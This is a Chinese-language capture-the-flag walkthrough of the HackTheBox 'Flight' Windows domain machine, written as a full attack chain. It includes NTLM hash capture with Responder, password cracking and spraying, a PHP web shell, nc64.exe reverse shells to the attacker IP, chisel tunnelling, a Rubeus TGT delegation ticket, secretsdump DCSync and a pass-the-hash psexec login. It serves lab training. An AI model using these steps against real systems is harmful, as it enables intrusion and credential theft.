hackthebox flight insane

主机发现

nmap -sV -sC -oN flight 10.10.11.187

88端口开放所以是一个域环境

tips:在域环境中,只要与kerberos相关的事情,必须要与域环境中的时间一致

域环境smbenum主机头

由于开放了445端口,首先用cme枚举445端口 cmd --help 枚举可用常规选项 cme smb --help 查看smb内的选项

cme smb 10.10.11.187 枚举运行smb服务的这个主机名是什么 显示为G0 添加到hosts文件中

查看web服务

发现是一个类似预定机票的页面

利用gobuster爆破目录

gobuster -u http://10.10.11.187 -w /opt/xx.xxdictionary -x php,git,asp

域环境enum web的主机头 通过host字段 

目的:查看有没有其他的主机开启了web服务

ffuf -u http://10.10.11.187 -H "host: FUZZ.flight.htb" -w /xx dictionary -mc all -fs 7069

根据显示出哪个多fs的size就是哪个,一般多的都是不正确的

跑出一个school主机头 写入hosts文件中

访问这个主机开启的web服务 点击导航栏看到url的变化从school.flight.htb/index.php出现几个字符 ?view=about.html

查看school.flight.htb/about.html出现一段文本,那这个view的作用就是将这段about.html的文本渲染到已经形成好的页面上,有点像先摆好面包,再决定上什么酱的感觉

那么这个interact参数有可能存在目录穿越漏洞(单纯泄露文件内容)和本地文件包含漏洞(会执行代码)

CTRL U 看看网页源代码有没有显示出php的页面存不存在这个漏洞 

 发现由php代码,查看发现是对view的内容后缀名由要求 只要由.. \ htaccess 和shtml就直接报错拦截

所以不能使用目录穿越漏洞,本地包含可以试一下

抓包尝试一下看看能不能进进行远程文件包含

发送该请求,并在kali监听445端口看看有没有申请访问的列表

nc -lvnp 445

确实有访问到,所以可以利用responder来监听网卡获得信息

python3 responder.py -I tun0

再次回到抓包的页面利用view进行一个远程文件访问kali的smb服务得到信息 (第一次失败)

因为之前我们尝试访问smb的时候用的就是这两个路径存在缓存的关系,修改subscribe添加一个2即可

成功获得hash值

copy这个ntlmhash到hashcat中进行破解

hashcat hashfile /usr/share/wordlists/rockyou.txt

成功破解

密码是S@Ss!K@*t13

所以这个用户名密码是SVC_APACHE/S@Ss!K@*t13

如果这里没有即使记录到帐号以及密码,那么可以使用sqlite3 responder.db .dump查看对应的账号密码

由于不知道这个账号密码是哪个服务的账号密码可以使用cme进行爆破猜解

首先查看445端口是不是这个账号密码
cme smb 10.10.11.187  -u 'svc_apache' -p 'S@Ss!K@*t13'

再试一下--shares 有没有共享的目录

存在

利用smbclient和这对账号密码进行登录查看有没有什么值得的信息

smbclient //10.10.11.187 -U 'svc_apache' //10.10.11.187/Shared

password:xxx

由于smb里面展示的服务比较多,我们先利用cmd的--users选项将所有的users都能打印出来

cmd smb 10.10.11.187 -u 'svc_apache' -p ' 密码' --users > users.txt

利用awk将第五列的所有用户名都打印出来

cme smb 10.10.11.187 -u 'svc_apache' -p 'mima ' --users  | awk '{print $5}'

利用cme进行密码喷射看看会不会有其他用户也会用同一个密码进行登录

将上述所有的账户写到users.txt中

cme smb 10.10.11.187 -u users.txt -p '密码' 

找到了一个就停下来了 但是这是我们已经有的密码 添加--continue-on-success

cme smb 10.10.11.187 -u users.txt -p '密码' --continue-on-success

发现还有一个叫S.Moon的用户用的也是这个密码

利用cme查看moon用户再smb共享了什么文件夹

cme smb 10.10.11.187 -u 'S.Moon' -p '密码' --shares

再利用smbclient -U 'S.Moon' //10.10.11.187/Web等逐个查看共享了什么东西

可以利用这个共享目录放一个poison file去获得一个新得hash

 discovering a writeable share dropping a scf file to get a hash

but easier way to create one poison file is ntlm_theft 

git clone https://github.com/Greenwolf/ntlm_theft　　

利用这个工具生成几个文件

python ntlm_theft.py -g all -s 10.10.14.8 -f pleasesubscribe

生成文件之后,进入到靶机smb里面进行

同时利用responder监听tun0端口抓取smb hash

python responder.py -I tun0 监听完成后 再次进入到靶机smb里面进行操作

将我们利用ntlm_theft生成的文件put到靶机smb中

smb:> put pleasesubscribe.scf #报错

可能是权限得问题

那再尝试一下其他的

smb:> put desktop.ini　　#成功

#desktop文件长这样

成功上传到靶机后,该poison file就会自动执行 sleep 120 来确定两分钟之内responder有没有抓到hash 如果没有的话就换下一个文件

responder成功抓取到hash

复制保存到hash.txt并利用hashcat进行破解

hashcat hash.txt /usr/share/wordlists/rockyou.txt #让hashcat自动寻找是什么类型的文件

找到密码为Tikkycoll_431012284 　　将获得到的账号以及密码都保存好

由于他是smb的hash,所以也可以利用cme获取这个C.BUM用户开启了什么smb的共享目录

cme smb 10.10.11.187 -u 'C.BUM' -p 'Tikkycoll_431012284 --share

发现这个web目录具有可读可写权限,尝试能不能在里面写一个shell文件

在/tmp目录下创建一个shell.php

<?php system($_REQUEST['cmd']);?>

靶机smb命令行

smb :> lcd /tmp目录下 #local cd 本地目录切换

smb :> put shell.php

根据目录提示所以这个shell.php应该在根目录的位置

直接访问 http://flight.htb/shell.php?cmd=whoami #成功

利用nc或者bash直接反弹shell

但是这里与以往不同的是,这个靶机是windows主机,所以要额外下载nc64.exe利用smb上传到靶机上

#下载netcat

点击netcat 1.12download并解压到/tmp目录下 #主要是为了和smb的的local 目录对应

smb :> put nc64.exe #成功上传

http://flight.htb/shell.php?cmd=nc64.exe -e powershell.exe10.10.14.8 9001 #注意是powershell.exe

然后突然报错说404页面 说明我们上传的shell.php被删掉了 可能存在定期删除上传文件的机制

重新put一下shell.php和nc64.exe 

上传成功后refresh一下 kali段监听的9001成功获取powershell

查看权限

whoami 

想上下快速打出命令的时候发现是[[A和]]B 重新利用rlwrap nc -lvnp 9001监听即可

获取shell后想找一个能够写入的目录

利用icacls并指定某个目录去查看这个目录的权限

icacls development

说明flight\C.Bum是具有这个目录的写权限

在powershell中切换用户

runas /user:c.bum cmd

有一个项目叫runascs

 https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 下载zip文件

并解压文件出两个exe文件,利用curl将runascs文件上传到靶机上

curl http://10.10.14.8/runascs.exe -o runascs.exe

根据runascs的用法 后面跟C.bum Tikkycoll_431012284 'nc -e powershell.exe 10.10.14.8 9001' -r 

所以还要将nc64.exe上传到靶机上

curl http://10.10.14.8:8000/nc64.exe

再看看runascs的example能查看到runascs后 重定向一个指定的命令到远程主机

.\runascs c.bum passwd powershell.exe -r 10.10.14.8:9001

成功获取到账户是C.bum用户的shell

然后进入到inethub的development目录,因为上面用moon的账户利用icacls查看过这个development目录对于用户c.bum有写权限

cd \inethub\development目录

写一个shell文件进去 --可以利用

或者下载/laudanum下aspx/shell.aspx

修改shell.aspx文件的目的地址以及端口

并用靶机shellcurl到development目录下

curl http://10.10.14.8/shell.aspx -o rev.aspx 

1.靶机将kali上的shell.aspx下载到development目录下

2.再尝试利用curl看看能不能直接执行shell.aspx文件 (失败) 

3.上传chisel进行http隧道 下载的是windowsamd64的版本　和linuxamd64版本

 (kali做服务器模式,让靶机链接kali)

kali server chmod +x chisel_linux_amd64  ./chisel_linux_amd64 -p  8001

windows靶机 : curl http://10.10.14.8:8000/chisel -o chisel.exe

运行 : chisel.exe client 10.10.14.8:8001 L:8000:127.0.0.1:8002

失败

报错: client cannot listen on L:8000=> 8002

(kali主动连接客户端模式 --reverse)

kali ./chisel_linux_amd64 -p 8001 --reverse

windows: chisel.exe client 10.10.14.8:8001 R:8002:127.0.0.1:8000

链接成功

kali访问本地的8002端口即可访问到靶机上上传的shell.aspx文件

利用这个命令执行的接口进行nc64.exe -e poweshell.exe 10.10.14.8 9001 将iis用户apppool\defaultapppool用户反弹shell

kali开启监听 :rlwrap nc -lvnp 9001

成功获取到shell,但是不确定这个shell是不是system级别的账户 这里可以利用responder然后在这个用户的shell里访问\\10.10.14.8\ipp\sec来访问kali的smb目录并开启responder抓取密码以及信息

成功抓取到并且前面是G0$的开头说明这个是system级别的用户

利用这个system级别的账户做一个tgt委派获得这个系统的ticket,再用来转储域或DC同步　

利用rubeus来进行攻击

Rubeus里面的kerberoast支持对所有用户或者特定用户执行kerberoasting操作，其原理在于先用LDAP查询于内的spn，再通过发送TGS包，然后直接打印出能使用 hashcat 或 john 爆破的Hash。

 在靶机的iis级账户shell中利用curl下载rubeus.exe

运行rubeus.exe

./rubeus.exe  tgtdeleg /nowrap #成功获取一张TGT

将ticket.kirbi复制出来并命名为ticket.kirbi.bare64 因为上面写明了是经过了base64加密后的ticket

cat ticket.kirbi.base64 | base64 -d > kirbi.ticket 

再利用kirbi2ccache ticket.kirbi ticket.ccache

生成完成 得到了一个ticket.ccache  file ticket.ccache is data

将票据注入到KRB5CCNAME中

export KRB5CCNAME=ticket.ccache

再利用secretdump.py进行打印 注意这张票据是g0开头,所以主机头要加一个g0

发现是报错并没有注入成功

注意域渗透最关键的一步也是要同步时钟

用ntpdate -s flight.htb对域环境的时间进行同步

发现回退了几个小时,再利用secretdump.py进行打印账户密码

secretdump.py -k --no-pass g0.flight.htb (失败)

仍然是报错 说是ldap的过滤器有问题

那就切换成impacket-secretsdump.py进行打印 

impacket-secretsdump.py -k --no-pass g0.flight.htb

成功打印

发现有administrator的hash

利用cme对administrator的smb进行账户和密码hash的检验

cme smb -u 'administrator' -H 'aad3bxxxxx:43bbfc530xxx17c'

说明是这个密码

再利用psexec.py获取administrator的shell

psexec.py administrator@10.10.11.187 -hashes 

成功获取shell

查看是否存在dig域传送获取所有的解析记录

利用dig 检测dns域传送漏洞

这里涉及dig 一个重要的命令axfr:

axfr 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写，指请求传送某个区域的全部记录。

我们只要欺骗dns服务器发送一个axfr请求过去，　如果该dns服务器上存在该漏洞，就会返回所有的解析记录值

dig axfr @10.10.11.187